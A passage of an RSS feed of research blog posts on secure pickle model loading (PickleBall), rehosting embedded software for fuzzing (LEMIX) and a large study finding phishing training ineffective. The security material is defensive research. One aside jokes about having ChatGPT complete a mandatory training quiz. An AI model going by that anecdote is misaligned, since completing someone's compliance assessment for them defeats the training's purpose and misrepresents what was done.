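    """Stands in for a disallowed callable; raises only if actually used."""
    def __init__(self, module, name):
        self._target = f"{module}.{name}"

    def __call__(self, *args, **kwargs):
        raise pickle.UnpicklingError(f"policy forbids invoking {self._target}")

class PolicyUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever a pickle opcode asks to import a callable.
        if (module, name) in ALLOWED_IMPORTS:
            return super().find_class(module, name)
        return LazyStub(module, name)  # lazy enforcement: defer the error

def load_with_policy(data: bytes):
    return PolicyUnpickler(io.BytesIO(data)).load()</pre><p>With this pattern, loading the malicious sketch from earlier fails at the moment the pickle program tries to invoke the stub standing in for `os.system`, while a benign model that merely carries an unused, disallowed callable still loads.</p>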
<p>This ensures that a model can only import and invoke callables when they are permitted by the policy.</p><p>Due to limitations in static policy generation, PickleBall policies might exclude some valid callables. In a straightforward implementation, this would raise a security exception any time a benign model imported one of these excluded callables, even if the callable is never used. However, we observed a pattern in some models: some callables are included in the model as metadata during training, but are not used during model loading or inference. For a user who only wants to use the model for inference, these callables should be ignored rather than causing the entire model loading process to fail.</p><p>To address this behavior, we implemented <em>lazy policy enforcement</em>: when a pickle program tries to import a disallowed callable, the security exception is not raised immediately. Instead, a stub object is created to track the disallowed callable, and the security exception is only raised when the stub object is accessed or invoked. This lets the model loading process conclude even when disallowed callables are imported but never used. This method does not compromise security, because the disallowed callable is not actually imported — only the stub object is created.</p><h3>Evaluation</h3><h4>Dataset</h4><p>We constructed a dataset composed of:</p><ul><li>16 <em>libraries</em> with pickle model loading APIs, to validate the generality of our library-based policy approach;</li><li>252 <em>benign models</em> that are each produced by one of these libraries; and</li><li>84 <em>malicious models</em> and pickle programs. The malicious models aim to represent all known techniques used to create malicious models, and are sourced from previous work that disclosed malicious models hosted on Hugging Face. We supplemented them with synthetic models that we created when we identified (and disclosed) gaps in existing model scanners.</li></ul><p>We generated policies for all 16 libraries in the dataset, and used these policies when loading the benign and malicious models to measure PickleBall’s effectiveness.</p><p>We highlight the main results of the evaluation below. Please see our paper for a full description of our evaluation setup and results.</p><h4>Q1: How well does PickleBall block malicious models from executing their payloads, and correctly load benign models?</h4><p>For each of the 16 libraries, we measured whether the generated policy permits loading of the associated malicious models in our dataset. We attempted to load each malicious model with the corresponding policy, and found that <em>each PickleBall policy blocks the corresponding malicious model in the dataset</em>.</p><p>So far so good — but does PickleBall simply block all models? That sure wouldn’t be very useful!</p><p>For each of the generated policies, we attempted to load and use the benign models in our dataset that were associated with the library. <em>PickleBall successfully loaded and performed an inference task on ~80% of the benign models in the dataset</em>.</p><p>In Q2, we measure overhead to see how much it costs to obtain this result. 
In Q3, we compare PickleBall’s results to competing techniques.</p><h4>Q2: What is PickleBall’s runtime overhead?</h4><p>We measured PickleBall’s runtime performance when generating policies (first figure) and when enforcing policies (second figure).</p><p>PickleBall is able to generate all policies for the libraries in the dataset in less than 30 seconds, with a median of 14 seconds. Policies need to be generated once per library, and updated when the library version is updated. These runtime results are therefore reasonable for integrating into a library release process, or into a user’s workflow when updating the library version installed on a system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*g1T0qtF-PvV86pD7W7yM5g.png" /><figcaption>Time to generate a policy for each library class in the dataset (averaged over 3 runs). This is a one-time step that can be integrated into existing workflows — either by library maintainers in the library’s release process, or by a user, prior to loading the model.</figcaption></figure><p>While enforcing the policies, PickleBall incurs a median runtime overhead of 0.42 ms compared to the regular Pickle Machine, representing a 1.75% increase. This cost is minimal, and is of course dominated by the subsequent cost of <em>training</em> or <em>inference</em> with the model once you’ve loaded it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kD4BUfZ6l5dwyk8ICTGGjw.png" /><figcaption>Time spent executing pickle.load in a test loading program, with and without PickleBall (averaged over 3 runs after 1 warmup run). PickleBall incurs a median runtime overhead of 1.75% and average runtime overhead of 2.62%.</figcaption></figure><h4>Q3: How does PickleBall compare to existing techniques?</h4><p>Finally, we compared PickleBall’s secure model loading performance to three state-of-the-art tools:</p><ul><li><a href="https://github.com/protectai/modelscan">ModelScan</a>: an open-source static model scanner developed by ProtectAI and integrated into Hugging Face’s platform as of 2025.</li><li><a href="https://github.com/s2e-lab/hf-model-analyzer">ModelTracer</a>: a dynamic model scanner developed by <a href="https://arxiv.org/abs/2410.04490">Casey et al</a>. that traces a model’s loading behavior to identify malicious activity.</li><li><a href="https://github.com/pytorch/pytorch/blob/main/torch/_weights_only_unpickler.py">Weights-Only Unpickler</a>: the restricted loader enabled by default in PyTorch v2.6 and onward.</li></ul><p>In total, we evaluated two model scanners (ModelScan, ModelTracer) and two restricted loaders (PickleBall, Weights-Only Unpickler).</p><p>The next table shows our results. We found that the model scanners are both bypassed by some malicious models in the dataset, while PickleBall and the Weights-Only Unpickler are not. The two restricted loaders achieve their security goals by blocking <em>all malicious models</em>.</p><p>Comparing PickleBall to the other restricted loader, the Weights-Only Unpickler, we found that PickleBall is able to load 44 more benign models, representing ~17% of the benign models in the dataset. This makes PickleBall a more usable security solution.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*37uHGHOBWbBh1Aja53pcRA.png" /><figcaption>The model scanners were bypassed by some malicious models in the dataset. 
PickleBall and the Weights-Only Unpickler both blocked all malicious models, and PickleBall was able to load more benign models.</figcaption></figure><h3>Conclusion</h3><p>In this post, we provided an overview of our work, “<em>PickleBall: Secure Deserialization of Pickle-based Machine Learning Models</em>”. PickleBall provides a secure approach for loading pickle-based machine learning models with library-specific loading policies.</p><p>We’ve shown that pickle-based models are still prevalent in the ML ecosystem, and introduced PickleBall, a system whose policies block all malicious models in our dataset while loading more benign models than the other existing secure solution.</p><p>Nothing is perfect, though. PickleBall (and other restricted loaders like the Weights-Only Unpickler) does <em>not</em> guarantee that the allowed callables cannot still be used maliciously. An interesting direction of future work is to determine whether callables permitted in an allowlist could be used as gadgets in malicious payloads, analogously to gadgets in code-reuse attacks.</p><h3>Resources</h3><p>To learn more about PickleBall, please see the following resources:</p><ul><li>Official PickleBall Publication: <a href="https://dl.acm.org/doi/10.1145/3719027.3765037">https://dl.acm.org/doi/10.1145/3719027.3765037</a></li><li>PickleBall Extended Report (Pre-print including appendices): <a href="https://arxiv.org/abs/2508.15987">https://arxiv.org/abs/2508.15987</a></li><li>PickleBall Source Code: <a href="https://github.com/columbia/pickleball">https://github.com/columbia/pickleball</a></li><li>PickleBall Artifact (including Datasets): <a href="https://zenodo.org/records/16974645">https://zenodo.org/records/16974645</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a089113e6b0f" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[LEMIX: Enabling Testing of Embedded Applications as Linux Applications]]></title>
            <link>https://davisjam.medium.com/lemix-enabling-testing-of-embedded-applications-as-linux-applications-895f85131cd8?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/895f85131cd8</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[software-development]]></category>
            <category><![CDATA[embedded-systems]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Tue, 02 Sep 2025 15:27:12 GMT</pubDate>
            <atom:updated>2025-09-02T15:36:29.510Z</atom:updated>
<content:encoded><![CDATA[<p>This blog post summarizes our recent work, “<em>LEMIX: Enabling Testing of Embedded Applications as Linux Applications</em>”, which appeared at the 2025 USENIX Security Symposium (USENIX Security’25). This work was done in collaboration with Profs. Aravind Machiry and Antonio Bianchi and a team of students, led by Sai Ritvik Tanksalkar. This post was written by Ritvik, with some light editing. You can find the preprint of the full paper <a href="https://arxiv.org/pdf/2503.17588">here</a>.</p><h3>Summary</h3><p>Embedded software runs on over 50 billion devices, yet much of it is written in memory-unsafe languages like C/C++, with nearly 2,000 embedded CVEs reported annually. Rehosting is a technique that enables executing embedded code without hardware, which is essential for testing. However, traditional emulation struggles with hardware diversity. Our analysis of 71 memory corruption CVEs across major RTOSes shows that 85% can be triggered with low-fidelity execution. Motivated by this, we present <strong>LEMIX</strong>, a framework that rehosts embedded applications as x86 Linux executables (LEAPPs), enabling dynamic analysis without emulation. We address key challenges, including preserving execution semantics, handling peripherals, and supporting fuzzing-based testing.</p><p>Our contributions are:</p><ul><li>Introduced LEMIX, an extensible framework to rehost embedded applications as x86 Linux executables (LEAPPs) <strong>without using emulation or physical hardware</strong>.</li><li>Developed novel analyses for <strong>preserving execution semantics, retargeting ISA-specific code, and modeling peripheral interactions</strong>; also enhanced testing and code coverage.</li><li>Evaluated on <strong>18 applications across 4 RTOSes,</strong> uncovering <strong>21 previously unknown bugs</strong>, most of which have been confirmed and fixed by vendors.</li><li>Demonstrated <strong>superior code coverage</strong> and bug-finding capability over existing state-of-the-art approaches.</li></ul><h3>Background &amp; Motivation</h3><p>With the growing diversity of embedded software, creating accurate emulation models for each platform is becoming increasingly impractical. Existing state-of-the-art tools like MultiFuzz, Fuzzware, and HALucinator rely on external emulators (<em>e.g.</em>, QEMU) to rehost and test embedded applications. However, our study shows that faithfully replicating every instruction as on real hardware is often unnecessary. Most bugs can be triggered with “just enough” fidelity, which we define as <strong>Bug Manifestation Fidelity (BMF)</strong>: the minimum execution fidelity required to trigger bugs of a particular class.</p><p>As an example, consider tud_msc_read10_cb, shown below. Executing this function requires the scheduler to run, which only depends on clock behavior. LEMIX achieves BMF by executing the application, handling MMIO (<em>e.g.</em>, returning fuzzed data on reads, ignoring writes), and detecting memory safety violations, all without modeling peripherals in detail.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/727/1*vY0Kd0KnSW_HvXyy8a36RA.png" /><figcaption>Lack of bounds checking on the offset allows an out-of-bounds read from mac_disk[lba], potentially leading to information disclosure or undefined behavior. 
Note that this code snippet — although taken from an embedded code base — contains a conventional memory safety error that can be detected without knowledge or emulation of the underlying hardware.</figcaption></figure><p>To formalize this concept, we break down <strong>Execution Fidelity (EF)</strong> into four components:</p><ul><li><strong>Language Semantic Fidelity (S):</strong> Preserving high-level program behavior such as control flow and data types.</li><li><strong>Assembly Execution Fidelity (A):</strong> Correct execution of ISA-level instructions.</li><li><strong>Peripheral Handling Fidelity (P):</strong> Handling of memory-mapped I/O and peripheral interactions.</li><li><strong>Clock Fidelity (C):</strong> Accuracy of timing behavior, including interrupts and system clock.</li></ul><p>EF is expressed as a tuple &lt;S, A, P, C&gt;, with each component rated as Low (L), Medium (M), or High (H).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/592/1*4bJNS4K3404ZcREV4vN_YA.png" /><figcaption>LEMIX in contrast to existing rehosting approaches.</figcaption></figure><p>Our empirical study of 71 memory corruption CVEs revealed that most can be triggered with a fidelity of &lt;H, L, M, M&gt;, <em>i.e.</em>, High language-semantic fidelity, Low assembly-execution fidelity, and Medium peripheral and clock fidelity. We design <strong>LEMIX</strong> to target this parameterization of fidelity. Unlike emulator-heavy approaches, LEMIX rehosts embedded applications as x86 Linux binaries, enabling dynamic analysis without requiring full hardware modeling.</p><h3>Challenges and Approach</h3><p>We set out to design a generic technique that caters to various RTOSes, architectures, and peripherals. This involved tackling several challenges. The next figure gives an overview of the LEMIX approach.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-3PEBPGyp4IYsnuvxe0jgw.png" /><figcaption>On the left is the architecture of a “Type-2” (<em>i.e.</em>, RTOS-based) embedded system. LEMIX provides mostly-automated porting to produce a comparable Linux-based application. That approach enables the application of off-the-shelf program validation tools such as fuzzers.</figcaption></figure><h3>Challenge 1: Preserving Execution Semantics</h3><p>Unlike Linux applications, which typically follow a single-threaded model, embedded applications are designed as event-driven, multithreaded systems. To enable portability across different microcontrollers, embedded RTOSes often include a portability layer that abstracts core RTOS concepts. For example, POSIX-based layers model tasks as pthreads, interrupts as signals, and so on, preserving the semantic behavior of the original application. This is precisely what LEMIX leverages. However, directly swapping in POSIX equivalents for RTOS components often causes integration issues due to application-specific configurations or missing peripheral models.</p><p>To address this, LEMIX introduces an automated process that selectively applies the application’s RTOS configurations to a POSIX-compatible RTOS (LPL). Only those settings that compile cleanly are retained, ensuring semantic fidelity.</p><h3>Challenge 2: Retargeting To Different ISAs</h3><p>Embedded applications often rely on non-standard C features and ISA-specific assembly (<em>e.g.</em>, ARM), making them incompatible with compilers like Clang, even though Clang would enable more robust analysis on the generated LLVM IR. 
<h3>Challenge 2: Retargeting To Different ISAs</h3><p>Embedded applications often rely on non-standard C features and ISA-specific assembly (<em>e.g.</em>, ARM), making them incompatible with compilers like Clang, which would enable more robust analysis on the generated LLVM IR. Simply switching to Clang and targeting x86 results in failures — so very many failures :-( — due to toolchain and architecture-specific dependencies.</p><p>LEMIX addresses this through an interactive refactoring process that transforms embedded code into Clang-compatible form. We automate common refactorings using predefined templates and provide precise guidance for issues requiring developer input. This enables successful compilation to LLVM bitcode for further analysis. We tackle two aspects of this challenge:</p><ol><li><strong>Compiler Incompatibilities</strong>: Differences between GCC and Clang (e.g., type assumptions, unsupported features) are resolved via automated or guided refactoring.</li><li><strong>Inline Assembly</strong>: Inline assembly is commented out, and affected variables are safely initialized. For complex cases, LEMIX identifies and flags issues with suggested fixes.</li></ol><h3>Challenge 3: Handling Peripheral Interactions</h3><p>Embedded systems access peripherals mainly via Memory-Mapped I/O (MMIO) addresses, which represent physical hardware. Correctly distinguishing MMIO from regular memory is essential to avoid incorrect behavior.</p><p>LEMIX assumes malicious peripherals that can control all MMIO inputs. To handle this, reads from MMIO addresses are modeled as reads from standard input, while writes to device memory are ignored since the focus is on vulnerability detection.</p><ul><li>Instead of relying on often incomplete SVD files, LEMIX automatically identifies MMIO ranges by analyzing constant hardcoded addresses used in load/store instructions. It groups related addresses by coalescing pages within ±2 KB of each detected range.</li><li>At runtime, compile-time instrumentation hooks all memory accesses. If a load targets an MMIO address, the hook returns input data; stores to MMIO addresses are ignored. This enables realistic peripheral interaction modeling without precise hardware details (see the sketch after this list).</li><li>LEMIX handles interrupts as random peripheral inputs by identifying ISRs via RTOS-specific patterns (e.g., vector tables) while excluding assembly-only handlers. It creates a Dispatcher Task to invoke ISRs at arbitrary intervals and uses lightweight binary analysis and dynamic tracing to disable ISRs that cause false crashes due to unmet preconditions.</li></ul>
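<p>To make the runtime hooks concrete, here is a minimal C sketch of the idea (the fixed range, the default value, and the function names are illustrative only; as described above, LEMIX discovers MMIO ranges automatically):</p><pre>#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* Illustrative MMIO range; LEMIX derives real ranges by analyzing
 * hardcoded constant addresses in load/store instructions. */
#define MMIO_BASE 0x40000000u
#define MMIO_END  0x40100000u

static int is_mmio(uintptr_t addr) {
    return addr &gt;= MMIO_BASE &amp;&amp; addr &lt; MMIO_END;
}

/* Instrumentation replaces each 32-bit load with a call like this:
 * MMIO reads return fuzzer-supplied bytes from standard input. */
uint32_t hooked_load32(uintptr_t addr) {
    if (is_mmio(addr)) {
        uint32_t fuzzed = 0;
        if (fread(&amp;fuzzed, sizeof fuzzed, 1, stdin) != 1) {
            fuzzed = 0; /* out of fuzzer input: default to zero */
        }
        return fuzzed;
    }
    return *(volatile uint32_t *)addr; /* ordinary memory: real load */
}

/* Stores to device registers are simply dropped. */
void hooked_store32(uintptr_t addr, uint32_t value) {
    if (!is_mmio(addr)) {
        *(volatile uint32_t *)addr = value;
    }
}</pre>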
<h3>Implementation</h3><p>The following figure shows how we combine these parts to realize the LEMIX prototype.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3MmWKvmelpOirMyY8iaH6g.png" /></figure><h3>Evaluation &amp; Results</h3><h4>Questions</h4><p>We evaluate LEMIX by answering the following questions:</p><ul><li><strong>RQ1</strong>: How effective is our approach in converting embedded applications to LEMIX APPlications (LEAPPs) and how much manual effort is required?</li><li><strong>RQ2</strong>: How effective is our peripheral identification analysis?</li><li><strong>RQ3</strong>: What is the effectiveness of testing LEAPPs through different fuzzing approaches, <em>i.e.</em>, whole-program and function-level fuzzing, and how do they compare with the existing state-of-the-art?</li></ul><h4>Dataset</h4><p>Remember, LEMIX is targeting Type-2 embedded systems (<em>i.e.</em>, those based on a real-time embedded operating system/RTOS). We selected 18 applications across four diverse RTOSes: FreeRTOS, Zephyr, NuttX, and ThreadX. These included both large, actively maintained projects (<em>e.g.</em>, PX4, Infinitime) and smaller peripheral-focused ones (<em>e.g.</em>, Nrf_Pwm), to increase our confidence in the generalizability of our approach.</p><h4>RQ1: Converting to Linux Applications</h4><p>We evaluate LEMIX by measuring its success in converting 18 embedded applications to Linux executables and the manual effort required, with a conversion considered successful if the application compiles and runs without crashing. Manual effort falls into three categories:</p><ul><li>Setup (source files and build steps)</li><li>Compiler fixes</li><li>Inline assembly handling, with time spent and source code changes tracked.</li></ul><p>Conversions were performed by graduate students with moderate C/C++ skills and limited embedded experience, making our effort estimates conservative upper bounds. Compiler fixes required little effort (20–40 min) despite significant SLOC changes: NuttX apps needed none, and larger FreeRTOS apps needed slightly more. Inline assembly handling also took minimal time (20–30 min median), demonstrating the effectiveness of LEMIX’s automated transformations.</p><h4>RQ2: Peripheral Handling</h4><p>None of the discovered MMIO ranges conflicted with a ported application’s virtual memory, confirming accurate instrumentation. Over 50% of the identified MMIO ranges were missing in the SVD files, but manual inspection confirmed they correspond to valid peripheral addresses used in the code, highlighting gaps in SVD documentation rather than shortcomings of our approach.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/862/1*qBMP0TKjgrWhPuhcWOjvjw.png" /><figcaption>This aspect of LEMIX involved detecting memory-mapped regions. These are nominally declared in SVD files. We found that LEMIX’s automatic analysis often disagreed with the SVD files (red bars) but that LEMIX’s analysis was typically correct. Automated tools can overcome poor documentation!</figcaption></figure><h4>RQ3: Testing LEAPPs &amp; Comparative Evaluation</h4><p>We evaluate under three fuzzing modes:</p><ul><li>M1: Whole-program fuzzing with MMIO instrumentation.</li><li>M2: M1 + weakened state-dependent conditions.</li><li>M3: Function-level fuzzing with M1+M2 optimizations.</li></ul><p>We compare against two prior works, <strong>MultiFuzz (Mf)</strong> and <strong>Fuzzware (Fw)</strong>.</p><p><strong><em>Setup</em>:</strong> For whole-program fuzzing, we modified AFL++ to meet our real-time fuzzing needs, leveraging its persistent mode. For function-level fuzzing, ~100–150 risky functions per app (identified via pointer usage and manual checks) were fuzzed independently for ~5 min/function.</p><p><strong><em>Results:</em></strong></p><ul><li><strong>Coverage:</strong> LEAPPs reached &gt;70% of reachable functions; M3 achieved ~10× higher coverage than whole-program fuzzing.</li><li><strong>Bugs:</strong> Function-level fuzzing revealed 11 unique bugs missed by whole-program fuzzing. On average, LEMIX (M2/M3) detected 21 bugs, vs. Mf (1) and Fw (3).</li></ul><p><strong>Comparison:</strong> Mf generally outperformed Fw in coverage but achieved less coverage than LEMIX, except on apps (n1, z2) that benefit from nested interrupt support, which LEMIX’s simpler interrupt model lacks. Fw also produced false positives (e.g., z1 crashes).
All baseline bugs were also detected by LEMIX using AFL++.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OpkdP29iDaQxfsA44eTtbg.png" /><figcaption>Using LEMIX to port applications to Linux and then employing an off-the-shelf fuzzer (AFL++), we found that (1) the M3 configuration of LEMIX produced substantially better line coverage; and (2) both M2 and M3 configurations substantially outperformed the state-of-the-art baselines.</figcaption></figure><h3>Conclusion</h3><p>We present <strong>LEMIX</strong>, a system for rehosting embedded applications as Linux binaries by addressing challenges in ISA retargeting, semantics preservation, and peripheral interaction handling. Evaluated across 18 applications spanning four RTOSes, LEMIX uncovered 21 previously unknown bugs, most of which have been confirmed and fixed by developers, and achieved higher coverage and bug detection than prior work. While LEMIX relies on RTOS-specific LPLs (commonly available) and may miss ISRs that depend on global state or code with fixed memory layouts, future work will focus on improving automation, broadening ISR coverage using techniques like AIM, and automatically refactoring layout-specific code to further enhance coverage and platform support.</p><h3>Acknowledgments</h3><p>This research was supported by Rolls-Royce and the National Science Foundation (NSF) under Grant CNS-2340548.</p><h3>Learn more</h3><ul><li>The full manuscript is <a href="https://arxiv.org/pdf/2503.17588">here</a>.</li><li>An artifact, including source code, is available <a href="https://zenodo.org/records/15611391">here</a>.</li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=895f85131cd8" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Phishing Training Still Isn’t Working, So Why Are We Still Paying for It?]]></title>
            <link>https://davisjam.medium.com/phishing-training-still-isnt-working-so-why-are-we-still-paying-for-it-5cb914c5c395?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/5cb914c5c395</guid>
            <category><![CDATA[corporate-training]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[phishing]]></category>
            <category><![CDATA[human-behavior]]></category>
            <category><![CDATA[science]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Thu, 19 Jun 2025 01:39:09 GMT</pubDate>
            <atom:updated>2026-01-16T18:00:59.150Z</atom:updated>
            <content:encoded><![CDATA[<p>As anyone who works with me professionally knows, I’m an empiricist at heart. My pulse quickens at the prospect of designing experiments to test hypotheses — preferably meaningful ones whose results might have some effect on the world. I recently completed one such study with my student Drew Rozema, who moonlights as (1) a professor and (2) a cybersecurity whiz. The result is a delicious study on phishing training, published at WWW’26 (<a href="https://arxiv.org/pdf/2506.19899">paper link</a>), that we wanted to share with you. This post is brought to you by Drew with minor editing by myself. All right, Drew, take it away!</p><h3>The question</h3><p>At least in the USA, anyone who spends any time with an email address associated with a major institution likely receives some phishing emails every day or two. We all roll our eyes and “Report Junk”, and wonder how anyone can fall for such things. But phishing is a major criminal enterprise, with most big attacks beginning with or facilitated by phishing. To combat phishing, we’ve also all participated in mandatory phishing training. After spending years in cybersecurity education, I’ve seen the same claims about phishing awareness training repeated like gospel: “<em>Users are the Human Firewall</em>,” “<em>Training reduces risk</em>,” “<em>Engaged employees are your first line of defense</em>,” “<em>Interactive learning drives change</em>” … but are these claims true?</p><ul><li><em>(Prof. Davis says: Given how I complete these trainings myself, it’s hard to believe they do any good. Sometimes I turn on the video, move it to the backup monitor, let it rip, and ask ChatGPT to finish the quiz for me. I’ve got other things to do. But of course I would never do this for An Important Training, so if you’re curious about yours then I definitely did it properly.)</em></li></ul><h3>The study design</h3><p>We conducted a large-scale study (N = 12,511) of phishing training effectiveness at a US-based financial technology (“fintech”) firm. Our two-factor design compared the effect of treatments (lecture-based, interactive, and control groups) on subjects’ susceptibility to phishing lures of varying complexity (using the NIST Phish Scale). After training, we performed controlled phishing simulations over a several-month period.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*S5IaPwDrIEXpLo_r" /><figcaption>Our method and results.</figcaption></figure><p>We used the resulting data to test four hypotheses:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/894/1*Dq9RWgHzkh9FS9uyQWiCTg.png" /><figcaption>Summary of study hypotheses, their theoretical grounding, and relation to prior work. The hypotheses address the effects of phishing email difficulty, training, and training modality on detection and reporting behaviors.</figcaption></figure><h3>What We Found: Training vs. Phish Difficulty</h3><p>The results? <strong>Training didn’t matter.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/377/1*APWkxVaChIDu3N0Ex-cTbQ.png" /><figcaption>Summary of training effectiveness results.
Average rates show that trained groups performed similarly to the control group, with modest differences across conditions.</figcaption></figure><p>To summarize:</p><ul><li>Employees <strong>who received no training</strong> were about as likely to click or report phishing emails as those who completed vendor-provided modules.</li><li>The <strong>difficulty of the phishing email</strong> — as defined by the NIST Phish Scale — was the <strong>only meaningful predictor</strong> of success or failure. “Easy” phish had a 7% click rate. “Hard” ones jumped to 15%.</li><li>Neither lecture-based training nor interactive quizzes produced statistically significant improvements in detection or reporting.</li><li>Effect sizes for training were <strong>below 0.01</strong> — too small to justify the enormous cost and compliance burden.</li></ul><h3>Discussion</h3><h4>A grain of salt: Proxy vs. Precise measures</h4><p>Our study used <strong>click-through rates</strong> as the primary measure of a user’s phishing susceptibility. This is a proxy for the actual measure of interest: the extent to which victims <em>disclose sensitive information</em> as a result of the phishing campaign. An ideal experiment would show whether phishing training reduces disclosure rates.</p><ul><li>It is conceivable that the actual world looks like this: “<em>About 10% of the time, people will click on phishing attempts. But with training, after clicking they are more likely to be suspicious and less likely to disclose data</em>”. If this is the case, our results would show only the first part of the real world and miss the crucial second part.</li><li>Do I think this is the actual result of training? Personally I doubt it — I think the lion’s share of defense is to keep the humans from clicking in the first place, which is why I’ve interpreted the results the way I did. I also note that the first step in any phishing attack is to get you to click. After that, the realism of the destination site becomes the major influence on subsequent behavior. If an employee chooses to click on a link that says it is to the Dropbox/Google/Salesforce/etc. login, it’s not difficult for an attacker to mock up a fake website nearly indistinguishable from the original.</li></ul><p>I suggest that if training has no effect on click-through rates, then (1) training should be much more focused on vetting site trustworthiness, and (2) companies might want to deploy more sophisticated guards on employees’ behaviors when they interact with untrusted websites. The idea of browser plug-ins that detect when sensitive information is being sent to an untrusted destination has been around for a long time (and is available through some endpoint detection and response tools), and maybe the time has come for a widespread embrace of this technology. This brings me to my next points:</p><p><em>Note: G. Malewicz reminded us of the perils of overemphasizing proxies vs. precise measures of the variable of interest. I am grateful for his attention.</em></p><h4>Echoing prior work</h4><p>This reinforces a now-familiar refrain: <strong>people don’t need more training — they need better shields.</strong></p><p>Multiple studies across different sectors have reached similar conclusions. Our findings align with growing evidence questioning training effectiveness. Ho et al.’s <a href="https://arianamirian.com/docs/ieee-25.pdf">study (2025)</a> found similar results — training had minimal impact on phishing susceptibility.
Likewise, Jampen et al.’s <a href="https://hcis-journal.springeropen.com/articles/10.1186/s13673-020-00237-7">2020 meta-analysis</a> concluded that while some short-term improvements are possible, the evidence for lasting behavioral change remains weak. While our results echo those of prior work, our work is distinctive for its large scale, its controlled setting, and its evaluation of several hypotheses.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/620/1*EEXVp-xS52cGdF14iMgXHA.png" /><figcaption>Summary of prior experiments on phishing and training interventions. Studies are organized by research context (lab vs. real-world). Context: “Lab” denotes research simulations, where subjects are not in their work roles. “Real-world” denotes studies where participants were employees acting in their job capacity. Complexity measure: whether the study controlled for the difficulty of the phishing tasks. ✓ indicates the use of an open control such as the NIST Phish Scale, and ✘ indicates no control. Hypotheses: how these works informed the hypotheses in our study.</figcaption></figure><h4>The Regulatory Elephant in the Room</h4><p>Despite the mounting evidence, <strong>training remains mandated</strong> by HIPAA, PCI DSS, ISO 27001, and others. This creates a compliance paradox: organizations continue to invest heavily in programs that demonstrably don’t move the needle.</p><p>While regulators may have good intentions, it’s time to ask hard questions:</p><ul><li>Should we <strong>redefine compliance</strong> to prioritize <em>effectiveness</em> over box-checking?</li><li>Can we incentivize <em>measurable outcomes</em> rather than relying on outdated training requirements?</li></ul><h4>When Training Hurts More Than Helps</h4><p>One of the more unsettling findings in our work and the broader phishing literature: <strong>training might actually increase risk in some cases.</strong> We saw higher click rates on “easy” phishing emails from trained users, suggesting that training may:</p><ul><li>Shift attention toward more sophisticated cues</li><li>Desensitize users to “obvious” threats</li><li>Create a false sense of confidence</li></ul><p>This phenomenon has been observed elsewhere. Caputo et al.’s <a href="https://ieeexplore.ieee.org/document/6585241">2014 study</a> tested embedded training delivered immediately after users clicked phishing links. Despite receiving contextual education about the specific phishing indicators they missed, participants were <strong>not significantly less likely to click in subsequent trials</strong> — even with just-in-time training at the moment of peak learning opportunity.</p><p>In short: some users overfit to training examples and miss the forest for the trees, while others simply don’t benefit from training regardless of timing or context.</p><h4>A Word About the Coming Storm: LLMs and AI</h4><p>What happens when phishing emails are no longer riddled with typos and poor grammar? What happens when attackers can:</p><ul><li>Clone organizational voices,</li><li>Autogenerate context-rich lures,</li><li>And tailor attacks to personal social graphs — <strong>at scale</strong>?</li></ul><p>This is not speculation — it’s happening now. 
Tools like ChatGPT, WormGPT, and open-source LLMs are already being weaponized.</p><p><strong>Training won’t stop that.</strong> Instead, we should be investing in:</p><ul><li><strong>Cryptographic sender verification: </strong>Deploying <a href="https://dmarcreport.com/blog/how-to-stop-email-spoofing-and-prevent-phishing-attacks-effectively/">SPF, DKIM, and DMARC</a> ensures emails are authenticated at the domain level before reaching inboxes. SPF verifies authorized IPs, DKIM uses cryptographic signatures to confirm message integrity, and DMARC ties SPF/DKIM together — allowing domain owners to specify handling of failed authentication while generating feedback reports. Together, these protocols create a powerful defense against spoofing and phishing (illustrative records follow this list).</li><li><strong>Secure PROCESSES for critical functions: </strong>High-risk actions — such as approving invoices, changing passwords, or resetting accounts — shouldn’t rely on a single email click. Instead, implement workflows with out-of-band confirmations (e.g. SMS or voice), multi-person approvals, and temporary tokens tied to user/device-specific factors. Embedding such verification steps dramatically reduces the risk of phishing-based breaches.</li><li><strong>Passwordless authentication: </strong>Eliminating passwords removes credentials that are often targeted by phishing. Modern solutions leverage <a href="https://en.wikipedia.org/wiki/WebAuthn">FIDO2/WebAuthn</a>, enabling authentication via hardware tokens or platform-based biometric systems. The private keys stay on the user’s device, preventing attackers from capturing shared secrets — making these methods inherently phishing-resistant. Major standards bodies and platforms (FIDO Alliance, W3C, Microsoft, etc.) recommend and support this approach.</li><li><strong>Zero‑trust network designs: </strong>With zero‑trust, no device or user — inside or outside the perimeter — is automatically trusted. Every access request is re‑authenticated, authorized based on least-privilege principles, and continuously validated. This limits the impact of stolen credentials or successful phishing clicks, preventing lateral movement within the network.</li><li><strong>User behavior anomaly detection: </strong>Automated monitoring solutions — such as Network Access Control (NAC), User and Entity Behavior Analytics (UEBA), and AI‑driven systems — track deviations from established user patterns. Sudden spikes in file access, off-hours logins, or anomalous data transfers trigger alerts or automatic contingencies. These tools detect suspicious activity even if a user unknowingly engages with phishing content.</li></ul>
